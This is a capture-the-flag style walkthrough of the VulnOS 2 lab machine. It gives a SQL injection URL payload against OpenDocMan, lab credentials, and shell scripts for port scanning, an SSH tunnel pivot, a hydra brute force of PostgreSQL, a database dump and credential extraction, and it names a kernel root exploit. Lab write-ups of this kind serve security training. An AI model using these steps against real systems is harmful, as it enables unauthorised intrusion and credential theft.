This post describes the steps needed to gain root on VulnOS 2, available on Vulnhub (https://www.vulnhub.com/). According to the author c4b3rw0lf (https://twitter.com/@c4b3rw0lf), the goal of this box is to get root on the system and read the final flag.
Machine Name: VulnOS: 2
Resource URL: https://www.vulnhub.com/entry/vulnos-2,147/
Release Date: 17 May 2016
Summary
To obtain administrative access on this box, the following kill chain was executed:
- Port and service enumeration.
- Recon against the web application.
- A SQL injection vulnerability in the documentation app (OpenDocMan) allowed the attacker to leak database contents, including credentials.
- Login over SSH with the leaked credentials (webmin:webmin1980).
- Credentials for the user vulnosadmin found in the PostgreSQL database.
- Lateral movement to the user vulnosadmin and the r00t.blend file.
- Root access.
WriteUp
Recon
During the recon step, the attacker enumerated ports and services with the nmap port scanner.
nmap found three open ports: 22/TCP, 80/TCP and 6667/TCP. To enumerate the web application on port 80/TCP, served by Apache 2.4.7, the attacker brute-forced file and directory names in the application.
Nikto revealed the directory /jabc and other files belonging to a web application. The page http://192.168.1.107/jabc/?q=node/7 mentions a further directory, /jabcd0cs/, and an access credential (guest/guest).
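The recon step above, as an added example (not code from the original write-up): a full TCP service scan written to nmap's grepable format, a parser that lists the open ports from that output, and a nikto run gated on port 80 being open. The target address and the sample scan output are constructed; only the three ports and the Apache version come from the write-up.

```shell
#!/bin/sh
# Added example (not from the original write-up): recon helpers for the port
# scan and web enumeration steps. The target and the sample scan output below
# are constructed, not results captured from VulnOS 2.

# Full TCP port scan with service detection, grepable output to $1.gnmap.
# nmap needs network access to the target; not run by the self-test.
scan_target() {
  nmap -sV -p- -oG "$1.gnmap" "$1"
}

# Parse nmap grepable (-oG) output and print one "port/proto service [version]"
# line per open port. A grepable port entry looks like
#   22/open/tcp//ssh//OpenSSH 6.6.1p1/
# i.e. port/state/proto/owner/service/rpc/version/.
open_ports() {
  awk -F'Ports: ' '
    /Ports: / {
      n = split($2, entry, ", ")
      for (i = 1; i <= n; i++) {
        split(entry[i], f, "/")
        if (f[2] != "open") continue
        line = f[1] "/" f[3] " " f[5]
        if (f[7] != "") line = line " " f[7]
        print line
      }
    }' "$1"
}

# Run nikto only when port 80/tcp turned up open in the parsed scan.
web_enum() {
  if open_ports "$1.gnmap" | grep -q '^80/tcp '; then
    nikto -h "http://$1/"
  fi
}

# Constructed sample of grepable output matching the three ports the
# write-up reports; version strings other than Apache are left empty
# because the write-up does not give them.
sample_gnmap() {
  printf 'Host: 192.168.1.107 ()\tStatus: Up\n' > "$1"
  printf 'Host: 192.168.1.107 ()\tPorts: 22/open/tcp//ssh///, 80/open/tcp//http//Apache httpd 2.4.7/, 6667/open/tcp//irc///\tIgnored State: closed (65532)\n' >> "$1"
}

# Usage against a live host (not executed here):
#   scan_target 192.168.1.107 && open_ports 192.168.1.107.gnmap && web_enum 192.168.1.107
```

Parsing the grepable file rather than eyeballing the terminal keeps the port list reusable by later steps (the SSH tunnel and the web checks) and survives a scan of all 65535 ports without scrolling.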
The web app at /jabcd0cs/ is OpenDocMan. This application has multiple known vulnerabilities:
- SQL Injection in OpenDocMan: CVE-2014-1945
- Improper Access Control in OpenDocMan: CVE-2014-1946
Exploitation
In the exploitation step, the attacker confirmed a SQL injection in the add_value parameter at the URL: http://192.168.1.107/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version.
The data reachable through the injection includes usernames, passwords and e-mail addresses, but the passwords are stored as MD5 hashes rather than in clear text.
To recover the password, the hash was submitted to CrackStation (https://crackstation.net/) and MD5Decrypt (https://www.md5decrypt.org/). MD5Decrypt recovered the password of the user webmin: webmin1980.
The attacker used the webmin credential to authenticate to the SSH service.
Privilege Escalation Part 1
To gain more privileges on the system, the attacker ran LinEnum (https://github.com/rebootuser/LinEnum) to gather information about the target.
PostgreSQL on the target listens only on the loopback interface (127.0.0.1), so a brute-force attack requires pivoting traffic to that interface. The attacker used SSH local port forwarding to tunnel from the attacking machine to the PostgreSQL service inside the target.
The brute-force attack found the password of the user postgres: postgres.
The postgres credential allowed the attacker to dump the database.
Credentials for the user vulnosadmin were found in the PostgreSQL dump; the password is stored in clear text.
Moving laterally to the user vulnosadmin, the attacker found the file r00t.blend in that user's $HOME directory.
The root password is hidden inside r00t.blend, in an object within the Blender scene.
With the root password ab12fg//drg, the attacker can log in as root.
With the root account, the attacker can read the flag.
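The pivot, brute force and dump steps above, as an added example (not code from the original write-up): an SSH local port forward to the loopback-only PostgreSQL service, a hydra run against the postgres role through that tunnel, a pg_dumpall with the recovered password, and a parser that pulls username:password pairs out of the dump's COPY blocks by reading the column positions from the COPY header. The table name users and the sample dump contents are constructed; the real table and the vulnosadmin password from the box are not reproduced here.

```shell
#!/bin/sh
# Added example (not from the original write-up): pivot to the loopback-only
# PostgreSQL service over an SSH local port forward, brute-force the postgres
# role, dump every database, and extract clear-text credentials from the dump.
# The table name "users" and the sample dump are constructed assumptions.

TARGET="${TARGET:-192.168.1.107}"
SSH_USER="${SSH_USER:-webmin}"
LOCAL_PORT="${LOCAL_PORT:-5432}"

# Local forward: connections to 127.0.0.1:$LOCAL_PORT on the attacker box are
# delivered to 127.0.0.1:5432 as seen from the target. -N: no remote command,
# -f: go to the background once authenticated.
open_tunnel() {
  ssh -f -N -L "${LOCAL_PORT}:127.0.0.1:5432" "${SSH_USER}@${TARGET}"
}

# Dictionary attack on the postgres role through the tunnel.
brute_postgres() {
  hydra -l postgres -P "$1" -s "$LOCAL_PORT" 127.0.0.1 postgres
}

# Dump all databases to $1 with password $2; PGPASSWORD avoids the prompt.
dump_all() {
  PGPASSWORD="$2" pg_dumpall -h 127.0.0.1 -p "$LOCAL_PORT" -U postgres > "$1"
}

# Print username:password pairs from the COPY block of table $2 in dump $1.
# pg_dump writes "COPY tbl (col1, col2, ...) FROM stdin;", then one
# tab-separated row per line, terminated by a line containing only "\.".
# Column positions are taken from that header rather than hard-coded.
creds_from_dump() {
  awk -F'\t' -v tbl="$2" '
    index($0, "COPY " tbl " (") == 1 {
      s = $0; sub(/^[^(]*\(/, "", s); sub(/\).*$/, "", s)
      n = split(s, cols, ", *")
      ucol = 0; pcol = 0
      for (i = 1; i <= n; i++) {
        if (cols[i] == "username") ucol = i
        if (cols[i] == "password") pcol = i
      }
      incopy = (ucol > 0 && pcol > 0)
      next
    }
    incopy && $0 == "\\." { incopy = 0; next }
    incopy { print $ucol ":" $pcol }
  ' "$1"
}

# Constructed dump fragment in pg_dump COPY format (the password is a
# placeholder, not the one found on VulnOS 2).
sample_dump() {
  {
    printf 'COPY users (id, username, password) FROM stdin;\n'
    printf '1\tvulnosadmin\tS3cret-placeholder\n'
    printf '2\tguest\tguest\n'
    printf '\\.\n'
  } > "$1"
}

# Usage against the box (not executed here):
#   open_tunnel && brute_postgres /usr/share/wordlists/rockyou.txt
#   dump_all all.sql postgres && creds_from_dump all.sql users
```

Reading the column order from the COPY header matters because pg_dump emits columns in table definition order, which differs between applications; grepping for the second tab-separated field would silently pick the wrong column on a differently laid-out table.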
Privilege Escalation Part 2
The target runs Ubuntu 14.04.4 LTS, and the kernel installed on this box is vulnerable to CVE-2015-1328 (https://people.canonical.com/~ubuntu-security/cve/2015/CVE-2015-1328.html). As the advisory describes it, the overlayfs implementation in the linux (aka Linux kernel) package before 3.19.0-21.21 in Ubuntu through 15.04 does not properly check permissions for file creation in the upper filesystem directory, which allows local users to obtain root access by leveraging a configuration in which overlayfs is permitted in an arbitrary mount namespace. Note that 3.19.0-21.21 is the fixed version of the 15.04 kernel line; the 14.04 kernel series received its own fixed package version, so compare the installed package version against the Ubuntu security notice for this CVE rather than against 3.19.0-21.21.
When the exploit runs, it spawns a root shell in the terminal, giving the attacker administrative access. A kernel exploit of this kind can hang or crash the target, so on a real engagement it is the last resort after the credential path above.
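A pre-flight check for the kernel route above, as an added example (not code from the original write-up): it reads the Ubuntu kernel package version from /proc/version_signature (uname -r drops the Debian revision) and compares it field by field against the first fixed version for that kernel series. The version strings in the self-test are constructed, and the 3.13.0-55.92 threshold used in the usage line for the 14.04 series is an assumption to be verified against Ubuntu's security notice for CVE-2015-1328.

```shell
#!/bin/sh
# Added example (not from the original write-up): decide whether the running
# Ubuntu kernel package predates the fix for CVE-2015-1328 before spending
# time on the exploit. The 3.13.0-55.92 threshold for the 14.04 series is an
# assumption; verify it against Ubuntu's security notice for this CVE.

# Return 0 when Ubuntu kernel version $1 sorts before $2. Both are split on
# "." and "-" and compared numerically field by field; a non-numeric field
# such as "generic" counts as 0, so "3.13.0-24.47-generic" compares as
# 3.13.0-24.47.
kver_lt() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    na = split(a, x, "[.-]"); nb = split(b, y, "[.-]")
    n = (na > nb) ? na : nb
    for (i = 1; i <= n; i++) {
      xa = (i <= na) ? x[i] + 0 : 0
      yb = (i <= nb) ? y[i] + 0 : 0
      if (xa < yb) exit 0
      if (xa > yb) exit 1
    }
    exit 1
  }'
}

# Ubuntu exposes the kernel *package* version (e.g. "3.13.0-24.47-generic")
# as the second word of /proc/version_signature; uname -r lacks the ".47".
running_kernel_version() {
  if [ -r /proc/version_signature ]; then
    awk '{print $2}' /proc/version_signature
  else
    uname -r
  fi
}

# Print "vulnerable" when package version $1 is older than fixed version $2,
# else "patched". $2 must be the fix for the same kernel series: 3.19.0-21.21
# is the 15.04 line quoted in the CVE text; the 14.04 line has its own.
cve_2015_1328_status() {
  if kver_lt "$1" "$2"; then
    echo vulnerable
  else
    echo patched
  fi
}

# Usage on the box itself (not executed here; threshold is an assumption):
#   cve_2015_1328_status "$(running_kernel_version)" 3.13.0-55.92
```

Running this before compiling a public PoC avoids the common failure mode of throwing a 2015 overlayfs exploit at a box that has already had its kernel updated, and makes the "why did the exploit not work" answer explicit.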
Conclusion
This machine is not much like the real world: the intended path to root is rather nonsensical, since nobody hides the root password inside a Blender file. Still, the recon, the exploitation and parts of the privilege escalation are quite nice.